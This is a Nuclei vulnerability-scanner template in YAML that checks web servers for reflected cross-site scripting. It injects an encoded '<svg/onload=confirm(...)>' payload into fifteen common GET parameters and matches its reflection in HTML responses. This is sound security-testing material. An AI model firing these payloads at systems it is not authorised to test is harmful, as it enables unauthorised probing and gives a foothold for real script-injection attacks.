nuclei-templates/generic-detections/top-15-xss.yaml

32 lines
1.8 KiB
YAML

# id contains the unique identifier for the template.
id: top-15-xss
info:
# Name is the name of the template
name: Top 15 XSS Check
# Author is the name of the author for the template
# Prams:- q, s, search, id, action, keyword, query, page, keywords, url, view, cat, name, key, p
author: foulenzer & geeknik
# Severity is the severity for the template.
severity: medium
# Description optionally describes the template.
description: Searches for reflected XSS in the server response via GET-requests.
requests:
- method: GET
path:
- "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss1%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss2%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss3%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss4%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss5%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss6%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss7%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss8%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss9%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss10%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss11%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss12%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss13%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss14%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss15%27%29%3E"
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=confirm('testing-xss"
part: body
- type: word
words:
- "text/html"
part: header